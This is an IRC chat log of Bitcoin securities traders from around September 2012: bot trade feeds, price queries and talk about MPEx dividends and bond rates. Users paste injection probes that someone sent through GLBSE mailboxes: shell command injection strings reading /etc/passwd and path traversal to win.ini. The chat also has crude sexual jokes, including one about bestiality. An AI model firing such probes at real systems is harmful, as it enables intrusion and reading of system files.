is finally achieving to crash the market in order to buy cheap? Sep 01 00:48:36 [GLBSE] [PUREMINING] 44 @ 0.0892 = 3.9248 BTC [-] Sep 01 00:49:22 o nice dip Sep 01 00:49:32 should have sold more :) Sep 01 00:51:12 [GLBSE] [PUREMINING] 41 @ 0.0892 = 3.6572 BTC [-] Sep 01 00:51:34 [GLBSE] [PUREMINING] 44 @ 0.0891 = 3.9204 BTC [-] Sep 01 00:53:05 [GLBSE] [GIGAMINING] 2 @ 0.818 = 1.636 BTC [+] Sep 01 00:54:26 [GLBSE] [OBSI.HRPT] 80 @ 0.103 = 8.24 BTC [-] Sep 01 00:54:28 [GLBSE] [OBSI.HRPT] 1 @ 0.103 BTC [-] Sep 01 00:54:29 [GLBSE] [OBSI.HRPT] 1 @ 0.1028 BTC [-] Sep 01 00:57:25 [GLBSE] [OBSI.HRPT] 44 @ 0.1027 = 4.5188 BTC [-] Sep 01 00:58:54 [GLBSE] [YABMC] 3 @ 0.1113 = 0.3339 BTC [-] Sep 01 00:59:02 [GLBSE] [BIB.BVPS] 1500 @ 0.0039 = 5.85 BTC [+] Sep 01 01:00:54 [GLBSE] [MMM] 1 @ 0.821 BTC [-] Sep 01 01:01:47 [GLBSE] [GSDPT] 5 @ 0.0033 = 0.0165 BTC [-] Sep 01 01:02:48 [GLBSE] [NYAN.C] 1 @ 0.61 BTC [+] Sep 01 01:03:24 [MPEX] [S.MPOE] 53100 @ 0.00039223 = 20.8274 BTC [+] Sep 01 01:03:39 [MPEX] [S.MPOE] 3535 @ 0.00039223 = 1.3865 BTC [+] Sep 01 01:03:41 [MPEX] [S.MPOE] 7800 @ 0.00039353 = 3.0695 BTC [+] Sep 01 01:03:42 [MPEX] [S.MPOE] 4665 @ 0.00039408 = 1.8384 BTC [+] Sep 01 01:05:50 [GLBSE] [DMC] 15 @ 0.068 = 1.02 BTC [+] Sep 01 01:10:48 why are everyone still talking about pirate crashing the market... pirate is happy with his defaulted on bitcoins being high priced Sep 01 01:11:34 [GLBSE] [BIB.BVPS] 1500 @ 0.0039 = 5.85 BTC [+] Sep 01 01:21:38 Maybe Sep 01 01:22:21 I think this is just the weekend starting Sep 01 01:22:24 nothing more Sep 01 01:22:47 The profits from the inevitable weekend dip have been cleaned out. Sep 01 01:23:03 It's too sudden to be a natural weekend dip Sep 01 01:23:16 Exactly. It's people just predicting it. Sep 01 01:23:38 It's somebody taking advantage of that, pushing the price down Sep 01 01:24:01 Knowing that until monday, it won't fully recover Sep 01 01:25:08 [GLBSE] [TYGRR.BOT] 1 @ 1 BTC [+] Sep 01 01:26:11 TYGRR.BOT is still live? Sep 01 01:26:53 Return of the undead... Sep 01 01:28:50 [GLBSE] [FOO.PPPPT] 10 @ 0.35 = 3.5 BTC [+] Sep 01 01:36:05 [GLBSE] [PUREMINING] 8 @ 0.0917 = 0.7336 BTC [+] Sep 01 01:36:12 [MPEX] [S.MPOE] 8700 @ 0.00039226 = 3.4127 BTC [-] Sep 01 01:36:36 [GLBSE] [BBBB] 300 @ 0.00024 = 0.072 BTC [+] Sep 01 01:40:47 [GLBSE] [BDT] 7 @ 0.99 = 6.93 BTC [+] Sep 01 01:40:58 [GLBSE] [DMC] 20 @ 0.068 = 1.36 BTC [+] Sep 01 01:43:27 ;;bc,24hprc Sep 01 01:43:28 10.24 Sep 01 01:43:37 [GLBSE] [ASICMINER] 4 @ 0.11406 = 0.4562 BTC [-] Sep 01 01:44:34 [MPEX] [S.MPOE] 32100 @ 0.00039226 = 12.5915 BTC [-] Sep 01 01:45:22 [GLBSE] [BTCMC] 3 @ 0.40000002 = 1.2 BTC [-] Sep 01 01:45:31 [MPEX] [S.MPOE] 49613 @ 0.000388 = 19.2498 BTC [-] Sep 01 01:48:20 ;;ticker Sep 01 01:48:20 Best bid: 9.82491, Best ask: 9.82498, Bid-ask spread: 0.00007, Last trade: 9.8249, 24 hour volume: 62457, 24 hour low: 9.66, 24 hour high: 10.8285 Sep 01 01:50:32 [GLBSE] [HYDRO.BONDS] 1 @ 1.5989 BTC [+] Sep 01 02:05:08 [MPEX] [S.MPOE] 20900 @ 0.00038947 = 8.1399 BTC [+] Sep 01 02:08:04 [MPEX] [S.BVPS] 50 @ 0.00357386 = 0.1787 BTC [+] Sep 01 02:12:02 [GLBSE] [OBSI.1MHS] 3 @ 0.09348999 = 0.2805 BTC [+] Sep 01 02:12:03 [GLBSE] [OBSI.1MHS] 1 @ 0.09349 BTC [+] Sep 01 02:12:04 [GLBSE] [OBSI.1MHS] 21 @ 0.093779 = 1.9694 BTC [+] Sep 01 02:15:05 [GLBSE] [FPGAMINING] 1 @ 0.7999 BTC [+] Sep 01 02:17:08 [MPEX] [F.GIGA.ETF] 10151 @ 0.00087607 = 8.893 BTC [+] Sep 01 02:17:10 [MPEX] [F.GIGA.ETF] 7204 @ 0.00088024 = 6.3412 BTC [+] Sep 01 02:20:49 pigeons mm was somnetging on the forum i think Sep 01 02:20:52 [GLBSE] [BDT] 3 @ 0.99 = 2.97 BTC [+] Sep 01 02:24:50 [GLBSE] [UDN] 2 @ 0.1 = 0.2 BTC [-] Sep 01 02:26:11 ;;tslb Sep 01 02:26:18 Time since last block: 29 minutes and 12 seconds Sep 01 02:26:24 ;;market buy 50000 Sep 01 02:26:26 A market order to buy 50000 bitcoins right now would take 566371.5640 USD and would take the last price up to 12.1500 USD, resulting in an average price of 11.3274 USD/BTC. Sep 01 02:26:31 ;;ticker Sep 01 02:26:32 Best bid: 10.07395, Best ask: 10.07686, Bid-ask spread: 0.00291, Last trade: 10.07396, 24 hour volume: 65760, 24 hour low: 9.66, 24 hour high: 10.8285 Sep 01 02:26:41 still playing around 10 is it Sep 01 02:26:54 ;;bc,24hprc Sep 01 02:26:55 10.21 Sep 01 02:27:36 i don't think it's going to drop under 10 in ~30 min Sep 01 02:27:40 me either. Sep 01 02:29:17 [GLBSE] [DMC] 5 @ 0.068 = 0.34 BTC [+] Sep 01 02:29:51 looks like my short straddle at 10 was a good bet Sep 01 02:30:06 o, you have calls ? Sep 01 02:30:10 ya might make a little money there. Sep 01 02:30:20 i think im mostly loaded on puts atm. Sep 01 02:33:49 [GLBSE] [MMM] 1 @ 0.81 BTC [-] Sep 01 02:33:51 [GLBSE] [MMM] 1 @ 0.805 BTC [-] Sep 01 02:36:38 ;;ticker Sep 01 02:36:40 Best bid: 10.01431, Best ask: 10.08, Bid-ask spread: 0.06569, Last trade: 10.17999, 24 hour volume: 67689, 24 hour low: 9.66, 24 hour high: 10.8285 Sep 01 02:39:32 !ticker s.dice Sep 01 02:39:34 [MPEX:S.DICE] 1day: 0.0033 / 0.0033139 / 0.0034 (115100 shares, 381.43 BTC), 30day: 0.0032 / 0.00324939 / 0.0034 (2887663 shares, 9,383.16 BTC) Sep 01 02:42:21 Satoshi Dice is dead. Sep 01 02:42:22 [GLBSE] [MU] 2 @ 0.4 = 0.8 BTC [-] Sep 01 02:42:28 There will be a selloff soon Sep 01 02:42:45 seems like nothing is going Sep 01 02:43:25 [GLBSE] [PUREMINING] 7 @ 0.0917 = 0.6419 BTC [+] Sep 01 02:43:26 [GLBSE] [DMC] 10 @ 0.068 = 0.68 BTC [+] Sep 01 02:46:36 ;;ident Bane_Capital Sep 01 02:46:37 Nick 'Bane_Capital', with hostmask 'Bane_Capital!~clown@r74-192-154-88.gtwncmta01.grtntx.tl.dh.suddenlink.net', is not identified. Sep 01 02:46:41 hi there. are you new ? Sep 01 02:46:49 No, you know me. Sep 01 02:46:52 Just take a guess. Sep 01 02:46:54 under the name of ? Sep 01 02:47:11 I'm Emanuel. Sep 01 02:47:22 that's illuminating. emanuel who ? Sep 01 02:47:31 De Ortego Sep 01 02:47:34 o i c Sep 01 02:47:51 did yo umanage to clear with deadterra ? Sep 01 02:48:12 did i hear drama? Sep 01 02:48:14 I managed to transfer them to a undisclosed party for a fair price. Sep 01 02:48:19 a cool then. Sep 01 02:48:22 kakobrekla was there drama ? Sep 01 02:48:32 im aking :> Sep 01 02:48:38 lol. you're such a drama whore :D Sep 01 02:48:54 i know :( Sep 01 02:51:30 when you'll be all rich from btc going over 9k Sep 01 02:51:51 you'll end up paying young luscious drama students in your town to put up drama in transparent costumes fior you. Sep 01 02:51:59 information is money and drama is information Sep 01 02:52:03 Fine tastes you have there. Sep 01 02:52:07 so drama is money. Sep 01 02:52:11 and time is ? Sep 01 02:52:19 arbitrary. Sep 01 02:52:41 drama is moar arbitrary than time. Sep 01 02:53:05 nah Sep 01 02:53:21 omg how can you say that. Sep 01 02:53:44 maybe it depends on the def. of drama Sep 01 02:54:14 ;;bc,24h Sep 01 02:54:15 Error: "bc,24h" is not a valid command. Sep 01 02:54:24 ;;bc,24hprc Sep 01 02:54:26 10.21 Sep 01 02:54:30 also, i dont like time. Sep 01 02:54:53 [MPEX] [F.GIGA.ETF] 8500 @ 0.00088024 = 7.482 BTC [+] Sep 01 02:55:11 [MPEX] [O.BTCUSD.C100T] 1 @ 0.07619102 BTC [-] Sep 01 02:59:01 btw Sep 01 02:59:08 is it time for mpex div yet Sep 01 02:59:09 ;> Sep 01 02:59:39 yup will be announced soonish. Sep 01 02:59:55 i usually release the end of month results within a few hours. Sep 01 03:00:21 funny one btw guys did you see the nex Sep 01 03:01:04 mircea_popescu: so was it 10.21 or 10.2 at the buzzer? Sep 01 03:01:58 .2 good call. Sep 01 03:02:26 hmm Sep 01 03:02:27 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Sep 01 03:02:31 wall. Sep 01 03:05:32 [GLBSE] [BDT] 1 @ 0.99 BTC [+] Sep 01 03:08:02 ;;bc,24hprc Sep 01 03:08:03 10.20 Sep 01 03:09:55 [GLBSE] [COGNITIVE] 1 @ 0.6 BTC [-] Sep 01 03:09:57 [GLBSE] [COGNITIVE] 7 @ 0.5501 = 3.8507 BTC [-] Sep 01 03:09:58 [GLBSE] [COGNITIVE] 10 @ 0.55 = 5.5 BTC [-] Sep 01 03:10:29 [GLBSE] [SYNERGY] 10 @ 0.16 = 1.6 BTC [+] Sep 01 03:17:38 [GLBSE] [FDBF] 1 @ 0.14 BTC [-] Sep 01 03:20:44 mircea, is satoshidice going to crash soon? Sep 01 03:21:54 [GLBSE] [GSDPT] 114 @ 0.00335 = 0.3819 BTC [+] Sep 01 03:23:59 [GLBSE] [OBSI.HRPT] 1 @ 0.1028 BTC [+] Sep 01 03:24:01 [GLBSE] [OBSI.HRPT] 4 @ 0.1028 = 0.4112 BTC [+] Sep 01 03:24:15 usagi: how would he know? Sep 01 03:24:28 Because he could be in on it. Sep 01 03:24:32 [GLBSE] [OBSI.HRPT] 5 @ 0.1027 = 0.5135 BTC [-] Sep 01 03:24:39 He claims to know a lot about finance; have you read the contract? Sep 01 03:24:55 [GLBSE] [BLUECHIP] 12 @ 0.1 = 1.2 BTC Sep 01 03:25:07 usagi: only 72870 shares to 0 Sep 01 03:25:08 Maybe they designed it to fail? :p Sep 01 03:25:51 (price 0 that is) Sep 01 03:26:41 !pl BIB.BVPS 0.003 Sep 01 03:26:42 Requesting data from GLBSE (might take a while). Sep 01 03:26:43 BIB.BVPS [1@0.003BTC] paid: 0.00015143 BTC. Last price: 0.0039 BTC. Capital gain: 0.0009 BTC. Total: 0.00105143 BTC. (35%) Sep 01 03:27:48 [GLBSE] [GERBITIN.PYRA] 67 @ 0.85 = 56.95 BTC [-] Sep 01 03:28:59 alright Sep 01 03:29:02 i'm gonna do it Sep 01 03:29:10 .05 btc to 1dice1e6pdhLzzWQq7yMidf6j8eAg7pkY Sep 01 03:29:25 hahahaha Sep 01 03:29:34 Have you checked your glbse mailbox recently? Sep 01 03:29:51 [GLBSE] [PUREMINING] 8 @ 0.09159999 = 0.7328 BTC [-] Sep 01 03:29:51 smickles; if you want to gamble, hotwallet has better odds. Sep 01 03:29:52 usagi: i've never had any mail there Sep 01 03:30:02 aw crap. i lost Sep 01 03:30:11 we beat satoshidice by aroudn 0.7% Sep 01 03:30:34 try it today, hotwallet dot c, a! Sep 01 03:30:54 usagi: You also got a lot of spam? Sep 01 03:31:07 rdp: yeah someone's trying to inject glbse Sep 01 03:31:17 Like somebody searching for attack vectors Sep 01 03:31:26 [GLBSE] [NYAN.C] 1 @ 0.61 BTC [+] Sep 01 03:31:47 Yea, I told to ColdHardMetal on #GLBSE, but he's not online... Sep 01 03:32:04 Anyway, it seems to be all scaped Sep 01 03:32:18 ;;calc 2.99/[bc,24hprc] Sep 01 03:32:19 0.293137254902 Sep 01 03:32:54 ;;../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini Sep 01 03:32:55 Error: "../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini" is not a valid command. Sep 01 03:33:01 like that Sep 01 03:33:08 But they did it like 250 times Sep 01 03:33:35 usagi: thats pretty common Sep 01 03:33:39 directory transversal spider Sep 01 03:34:16 >a pear of sunglasses Sep 01 03:34:21 lol'd for some reason Sep 01 03:34:26 be more concerned about logs that look like GET \x81561\x196162\x90163136\x1093691\x18963821\x8163213\x18923651\x1251263y Sep 01 03:35:06 right Sep 01 03:35:57 usagi: was i supposed to have something in my glbse mailbox? Sep 01 03:36:00 that means its robots Sep 01 03:36:04 also grep your logs for netsparker and nessus and such if you want to scare yourself lol Sep 01 03:36:06 and robots are crafty Sep 01 03:36:19 always trying to take over the world Sep 01 03:36:30 [GLBSE] [UDN] 1 @ 0.1 BTC [-] Sep 01 03:40:01 [GLBSE] [ASICMINER] 26 @ 0.11406 = 2.9656 BTC [-] Sep 01 03:40:02 [GLBSE] [ASICMINER] 16 @ 0.11416 = 1.8266 BTC [+] Sep 01 03:42:55 [GLBSE] [PAJKA.BOND] 2 @ 0.06 = 0.12 BTC [+] Sep 01 03:44:41 [GLBSE] [YABMC] 1 @ 0.1176 BTC [+] Sep 01 03:51:04 [GLBSE] [OBSI.HRPT] 20 @ 0.104985 = 2.0997 BTC [+] Sep 01 03:55:51 [GLBSE] [OBSI.HRPT] 11 @ 0.104985 = 1.1548 BTC [+] Sep 01 03:57:26 [GLBSE] [FUTUREFUND] 180 @ 0.00012189 = 0.0219 BTC [+] Sep 01 04:12:46 [MPEX] [F.GIGA.ETF] 696 @ 0.00088024 = 0.6126 BTC [+] Sep 01 04:13:25 [MPEX] [S.MPOE] 5254 @ 0.00038947 = 2.0463 BTC [+] Sep 01 04:17:07 [MPEX] [S.MPOE] 2661 @ 0.00039063 = 1.0395 BTC [+] Sep 01 04:24:02 [GLBSE] [PUREMINING] 5 @ 0.09159999 = 0.458 BTC [-] Sep 01 04:34:51 [GLBSE] [TYGRR.BOND-P] 1 @ 0.2501 BTC [+] Sep 01 04:35:05 [MPEX] [S.MPOE] 8176 @ 0.000388 = 3.1723 BTC [-] Sep 01 04:35:06 [MPEX] [S.MPOE] 28618 @ 0.000387 = 11.0752 BTC [-] Sep 01 04:35:33 [GLBSE] [GERBITIN.PYRA] 1 @ 0.98 BTC [+] Sep 01 04:37:54 where does BTC-Mining live, anyone know? Sep 01 04:38:20 underground, in a mine Sep 01 04:38:30 what timezone is this mine in? Sep 01 04:38:49 [GLBSE] [GIGAMINING] 10 @ 0.8576 = 8.576 BTC [+] Sep 01 04:38:54 timezones only make sense when there's sunlight to go by Sep 01 04:38:56 this mine operates 24/7 Sep 01 04:39:02 with people sleeping in shifts around the clock Sep 01 04:39:28 mk results are out http://trilema.com/2012/mpoe-rezultate-august-2012/#comment-88317 Sep 01 04:39:28 ok, thanks for the info bro Sep 01 04:39:30 i got totally hosed. Sep 01 04:40:28 In Montreal Sep 01 04:40:57 [GLBSE] [PUREMINING] 1 @ 0.08920001 BTC [-] Sep 01 04:41:10 mircea_popescu: damn, sorry to hear that :/ Sep 01 04:41:17 not just because of my 0.000001% stake Sep 01 04:41:22 i suspekt i was played tbh. Sep 01 04:41:35 played? Sep 01 04:41:41 [GLBSE] [KRAKEN] 5 @ 0.01 = 0.05 BTC Sep 01 04:41:52 anyway. on the positive score, there's no more limit to bond interest rates now. Sep 01 04:41:54 sky's the limit. Sep 01 04:42:04 [GLBSE] [PUREMINING] 44 @ 0.0892 = 3.9248 BTC [-] Sep 01 04:42:50 [GLBSE] [TYGRR.BOND-P] 1 @ 0.28 BTC [+] Sep 01 04:42:57 "instrumkents " Sep 01 04:42:58 typo Sep 01 04:43:01 [GLBSE] [PUREMINING] 79 @ 0.0891 = 7.0389 BTC [-] Sep 01 04:43:10 oh Sep 01 04:43:11 [GLBSE] [NASTY] 1 @ 0.54 BTC [+] Sep 01 04:43:13 [GLBSE] [NASTY] 1 @ 0.54999999 BTC [+] Sep 01 04:43:14 [GLBSE] [NASTY] 5 @ 0.55 = 2.75 BTC [+] Sep 01 04:43:15 [GLBSE] [NASTY] 7 @ 0.56 = 3.92 BTC [+] Sep 01 04:43:17 this is auto translated from romanian Sep 01 04:43:17 [GLBSE] [NASTY] 13 @ 0.57 = 7.41 BTC [+] Sep 01 04:43:17 lol Sep 01 04:43:18 [GLBSE] [NASTY] 3 @ 0.59 = 1.77 BTC [+] Sep 01 04:43:23 this isn't bad Sep 01 04:43:40 [GLBSE] [BITBOND] 60 @ 0.4695 = 28.17 BTC [+] Sep 01 04:43:48 oh wait, it isn't Sep 01 04:43:51 gah, wtf Sep 01 04:43:56 okay, so it's a typo :) Sep 01 04:43:57 [GLBSE] [NASTY] 1 @ 0.59 BTC [+] Sep 01 04:44:31 [GLBSE] [GSDPT] 7 @ 0.003001 = 0.021 BTC [-] Sep 01 04:44:45 it'snot autotranslated, no. Sep 01 04:45:01 wantyed to get it out asap, will fixtypos shortly. Sep 01 04:45:02 [GLBSE] [FUTUREFUND] 350 @ 0.000116 = 0.0406 BTC [-] Sep 01 04:45:26 [GLBSE] [GOLD] 100 @ 0.00989 = 0.989 BTC [+] Sep 01 04:49:23 [GLBSE] [BITBOND] 50 @ 0.4695 = 23.475 BTC [+] Sep 01 04:50:08 [MPEX] [F.GIGA.ETF] 12100 @ 0.00088555 = 10.7152 BTC [+] Sep 01 04:50:09 [MPEX] [F.GIGA.ETF] 4723 @ 0.00088869 = 4.1973 BTC [+] Sep 01 04:52:42 [MPEX] [S.MPOE] [PAID] 500000000 @ 0.00000124 = 619.5151922 BTC Sep 01 04:52:56 it works! Sep 01 04:53:32 good job sir! Sep 01 04:54:22 o hey, cool! Sep 01 04:55:22 anyway, i'm available for shareholder/bondholder/journalist grilling. ask away. Sep 01 04:58:59 mircea_popescu: what was the motivation in lifting the mpbor interest limit? Sep 01 04:59:36 mircea_popescu: and, what's the risk of only receiving unsustainably high interest bids? Sep 01 04:59:37 i was alwyas planning to eventually lift it. Sep 01 05:00:03 the hosing of this month forced my hand so to speak. if people can be taken for half their investment they really should be allowed to choose their own %. Sep 01 05:00:18 and the risk is nil, let me explain this : Sep 01 05:00:26 exchange makes 1k btc over 2k btc in capital. Sep 01 05:00:40 if the interest of the 2k in capital is 1k btc, then the exchange will have made... 0. Sep 01 05:00:54 [GLBSE] [BIB.BVPS] 1000 @ 0.0036 = 3.6 BTC [-] Sep 01 05:00:55 if the interest is 2k then the exchange will have made -1k, and the excess paid as interest is taken from the bonds. Sep 01 05:01:02 so really bondholder can't get more than ALL the profit. Sep 01 05:01:35 [MPEX] [S.MPOE] 57900 @ 0.00038903 = 22.5248 BTC [+] Sep 01 05:01:39 [GLBSE] [BIB.BVPS] 1000 @ 0.0037 = 3.7 BTC [+] Sep 01 05:02:28 so there is the potential for the mpbor holders to take all profit from the operation. You anticipate the competition bidding will cause this not to occur? Sep 01 05:02:42 i would imagine so. Sep 01 05:02:58 [GLBSE] [FDBF] 5 @ 0.14 = 0.7 BTC [-] Sep 01 05:03:06 historically MPEx makes something in the 5 to 15% range. Sep 01 05:03:24 i doubt there's not going to be 10-100k btc available for that sort of rate, especially in the new economy. Sep 01 05:03:47 (yes, the fact that the pirate isn't around anymore was also a factor, i wasn't going to allow interest w/o ceiling in a ponzi atmopshere) Sep 01 05:05:02 so can we expect pirate to pay back about 4k now ;D Sep 01 05:05:12 if it was acrually him. Sep 01 05:05:34 i suspect a pass thru operator mor than pirate, actually Sep 01 05:05:44 if it was canspiracy Sep 01 05:05:45 i tell you one thing, if the total paid accounts ends up being about 4k Sep 01 05:05:49 ima be pretty fucken pissed off. Sep 01 05:08:01 mircea_popescu: Is the latest dividend listed on the s.mpoe page correct? ( http://polimedia.us/bitcoin/mpex.php?mpsic=S.MPOE ). It looks like half of what was actually paid out (thank you by the way!) Sep 01 05:08:36 maximian yes, all dividends are halved on mpex because nobody has in their acct but half the shares Sep 01 05:08:49 this is as investor protection, because the owner is never allowed to sell more than half the shares Sep 01 05:08:58 (this is because the shares are non-voting) Sep 01 05:09:13 so the comp makes 1k and has 1mn shares, you will see 500 btc paid Sep 01 05:09:16 but it's paid to 500k shares. Sep 01 05:09:21 per share dividend is the right ammt. Sep 01 05:09:34 Ok, makes sense - thanks Sep 01 05:11:24 .py 500000000 * 0.00000124 Sep 01 05:11:25 620.0 Sep 01 05:14:22 [GLBSE] [FDBF] 5 @ 0.14 = 0.7 BTC [-] Sep 01 05:18:19 [GLBSE] [TYGRR.BOND-P] 2 @ 0.2501 = 0.5002 BTC [-] Sep 01 05:22:19 [GLBSE] [FDBF] 10 @ 0.14 = 1.4 BTC [-] Sep 01 05:24:26 [GLBSE] [TYGRR.BOT] 1 @ 0.91 BTC [-] Sep 01 05:25:42 [MPEX] [S.DICE] 200000 @ 0.0034 = 680 BTC [+] Sep 01 05:26:48 [MPEX] [F.GIGA.ETF] 10504 @ 0.00088235 = 9.2682 BTC [-] Sep 01 05:26:50 [MPEX] [F.GIGA.ETF] 10144 @ 0.00087275 = 8.8532 BTC [-] Sep 01 05:27:48 [MPEX] [F.GIGA.ETF] 4656 @ 0.00087275 = 4.0635 BTC [-] Sep 01 05:27:49 [MPEX] [F.GIGA.ETF] 1144 @ 0.00087256 = 0.9982 BTC [-] Sep 01 05:28:25 Evoorhees bought out his final shares. Sep 01 05:28:36 or somebody else did, which I highly doubt. Sep 01 05:28:42 oh wait Sep 01 05:28:49 I though that was 2 million Sep 01 05:28:52 nevermind Sep 01 05:28:59 I weep for that sucker Sep 01 05:29:11 lol love the nick Sep 01 05:29:53 lol why weep ? Sep 01 05:30:14 His money is stuck in that stock for the next two months Sep 01 05:30:23 probably longer Sep 01 05:30:49 i don't follow. Sep 01 05:31:56 oh Sep 01 05:32:02 MPeX has liquidity Sep 01 05:32:05 nevermind Sep 01 05:32:23 mircea_popescu: > Total turnover 75 `648 contracts, of which -12`312 +7`100 CALL, -32`472 +23`764 PUT. Sep 01 05:32:46 ya ? Sep 01 05:32:47 July didn't have that + / - breakdown, did it? Sep 01 05:33:15 indeed not. Sep 01 05:34:02 How many bids are there for MPeX at the highest? Sep 01 05:34:11 what do you mean ? Sep 01 05:34:45 lol jcpham Sep 01 05:39:47 hi Sep 01 05:40:03 Okay Sep 01 05:40:08 not okay Sep 01 05:40:11 lol Sep 01 05:40:34 side effects may include viral infection and coughing Sep 01 05:40:47 There are 108`256 bids at .0033 for S.DICe Sep 01 05:40:53 That is okay Sep 01 05:41:33 [GLBSE] [BITCOINRS] 3 @ 0.050999 = 0.153 BTC [+] Sep 01 05:42:20 [GLBSE] [OBSI.HRPT] 1 @ 0.104979 BTC [-] Sep 01 05:42:34 aha ? Sep 01 05:49:51 [MPEX] [S.MPOE] 9300 @ 0.00038793 = 3.6077 BTC [-] Sep 01 05:49:52 [MPEX] [S.MPOE] 39 @ 0.00038903 = 0.0152 BTC [+] Sep 01 05:49:52 [MPEX] [S.MPOE] 23235 @ 0.00039408 = 9.1564 BTC [+] Sep 01 05:51:07 lol wtf Sep 01 05:51:14 anyway, ortego, what were you trying to ask ? Sep 01 05:51:28 ortego likes little kids Sep 01 05:51:39 "free candy" on the side of his van Sep 01 05:52:04 [MPEX] [S.MPOE] 5526 @ 0.00039458 = 2.1804 BTC [+] Sep 01 05:52:06 [MPEX] [S.MPOE] 27182 @ 0.000387 = 10.5194 BTC [-] Sep 01 05:52:07 [MPEX] [S.MPOE] 31800 @ 0.0003869 = 12.3034 BTC [-] Sep 01 05:52:08 [MPEX] [S.MPOE] 3913 @ 0.00038624 = 1.5114 BTC [-] Sep 01 05:52:19 i meant kittens Sep 01 05:52:22 not kids Sep 01 05:53:49 then it;d be free cream Sep 01 05:54:24 [GLBSE] [GIGAMINING] 1 @ 0.8576 BTC [+] Sep 01 05:54:27 free cream for kittens? is this a new section for you dtng sight mircea_popescu ? Sep 01 05:54:39 lol Sep 01 05:54:44 isn't that what kittens like ? Sep 01 05:55:12 mmmm Sep 01 05:55:15 kitten cream Sep 01 05:55:35 well tghe only time i had sex with a kitten it was via fresh cream Sep 01 05:55:39 i'm not expert tho. Sep 01 05:55:45 so i defer to the elders of the chanel. Sep 01 05:56:57 https://www.youtube.com/watch?v=UCOC1YwNwZw&feature=player_embedded#! Sep 01 05:57:21 hrm Sep 01 05:57:26 did someone just try to attack glbse? Sep 01 05:57:40 my mailbox is full of shit Sep 01 05:57:57 GLBSE box or email? Sep 01 05:58:03 glbse box Sep 01 05:58:10 new messages: 232. lawls. Sep 01 05:58:18 there's a glbse box ?! Sep 01 05:58:24 asdzxc Diablo-D3 19:06 Fri-31/Aug "|dir Sep 01 05:58:24 asdzxc Diablo-D3 19:06 Fri-31/Aug '|dir Sep 01 05:58:24 asdzxc Diablo-D3 19:06 Fri-31/Aug '&dir&' Sep 01 05:58:24 asdzxc Diablo-D3 19:06 Fri-31/Aug "&dir&" Sep 01 05:58:24 asdzxc Diablo-D3 19:06 Fri-31/Aug |dir Sep 01 05:58:25 asdzxc Diablo-D3 19:06 Fri-31/Aug &dir Sep 01 05:58:26 none on my end Sep 01 05:58:27 asdzxc Diablo-D3 19:06 Fri-31/Aug ;cat /etc/passwd; Sep 01 05:58:31 o wow Sep 01 05:58:32 asdzxc Diablo-D3 19:06 Fri-31/Aug "|"ld Sep 01 05:58:33 asdzxc Diablo-D3 19:06 Fri-31/Aug ||cat /etc/passwd Sep 01 05:58:35 asdzxc Diablo-D3 19:06 Fri-31/Aug ';cat /etc/passwd;' Sep 01 05:58:36 that looks like an actual xss. Sep 01 05:58:37 asdzxc Diablo-D3 19:06 Fri-31/Aug ";cat /etc/passwd;" Sep 01 05:58:39 asdzxc Diablo-D3 19:06 Fri-31/Aug "&cat /etc/passwd&" Sep 01 05:58:41 asdzxc Diablo-D3 19:06 Fri-31/Aug `cat /etc/passwd` Sep 01 05:58:43 asdzxc Diablo-D3 19:06 Fri-31/Aug |cat /etc/passwd# Sep 01 05:58:45 asdzxc Diablo-D3 19:06 Fri-31/Aug '|'ld Sep 01 05:58:47 asdzxc Diablo-D3 19:06 Fri-31/Aug cat /etc/passwd Sep 01 05:58:49 asdzxc Diablo-D3 19:06 Fri-31/Aug '&cat /etc/passwd&' Sep 01 05:58:51 asdzxc Diablo-D3 19:06 Fri-31/Aug &cat /etc/passwd& Sep 01 05:58:53 asdzxc Diablo-D3 19:05 Fri-31/Aug ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini Sep 01 05:58:56 asdzxc Diablo-D3 19:05 Fri-31/Aug ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini Sep 01 05:58:57 lol Sep 01 05:59:01 fuck you Diablo-D3 Sep 01 05:59:10 wow so someone tried yeah. Sep 01 05:59:13 glad they didn't pick me Sep 01 05:59:23 Obsi it'd be global if it worked. Sep 01 05:59:31 I mean to stuff in my box Sep 01 05:59:59 someone should quote that ^ out of context Sep 01 06:00:13 smickles: what? Sep 01 06:00:21 you rooted his box accidentally :D Sep 01 06:00:23 not sure glbse offers delete option on mails Sep 01 06:00:30 it does Sep 01 06:00:33 omg no fucking way !? Sep 01 06:00:33 I rooted your girlfriend's box Sep 01 06:00:34 but not bulk delete Sep 01 06:00:35 and didn't use a trojan Sep 01 06:00:40 Diablo-D3: i was under the impression that a 'fuck you' was required if someone posted more than 3 lines in irc Sep 01 06:00:46 copumpkin which one of them ? Sep 01 06:00:54 just playin gmy part ;) Sep 01 06:00:55 smickles: yes, but I'm Diablo-D3 Sep 01 06:01:43 Obsi are you a female she-girl person ? Sep 01 06:01:58 Depends how much you're willing to pay I suppose Sep 01 06:02:02 lol Sep 01 06:02:07 sounds about right./ Sep 01 06:04:36 b Sep 01 06:04:38 i Sep 01 06:04:39 t Sep 01 06:04:40 c Sep 01 06:04:41 o Sep 01 06:04:42 i Sep 01 06:04:43 m Sep 01 06:05:39 http://i.imgur.com/3JaDR.jpg Sep 01 06:05:39 how many bitcoins do i need to put away so that in 5-10 years i can retire? Sep 01 06:05:40 ahahaha Sep 01 06:05:43 apparently this is p harnett Sep 01 06:06:00 blazing 20-30k should do you. Sep 01 06:06:21 what about 3000 Sep 01 06:08:20 [GLBSE] [FUTUREFUND] 1 @ 0.000116 BTC [-] Sep 01 06:10:27 http://www.encyclopediabitcoinica.com/wiki/Bruce_Fagner#Personal_life << see last line in that section Sep 01 06:11:11 blazing might work. more like 10 years tho Sep 01 06:11:21 now go buy S.DICE S.MPOE and all the rest of the good stuff for them :D Sep 01 06:11:42 CHECK THE DILDO Sep 01 06:11:53 http://www.microcash.org/ Sep 01 06:12:00 rocket dildo! Sep 01 06:12:09 i click random page... i get http://www.encyclopediabitcoinica.com/wiki/Mircea_Popescu Sep 01 06:12:27 Bane_Lowercase http://polimedia.us/dtng/c/src/134642945119.jpg Sep 01 06:13:34 mircea_popescu: there arn't many pages on the wiki yet :/ Sep 01 06:13:42 is that MPOE-PR? Sep 01 06:13:45 apparently not Sep 01 06:13:45 hahahha Sep 01 06:13:57 mircea_popescu: did you see the recent change to the page? Sep 01 06:14:28 the one where you say you're secretly addicted to snorting nonpareils ? Sep 01 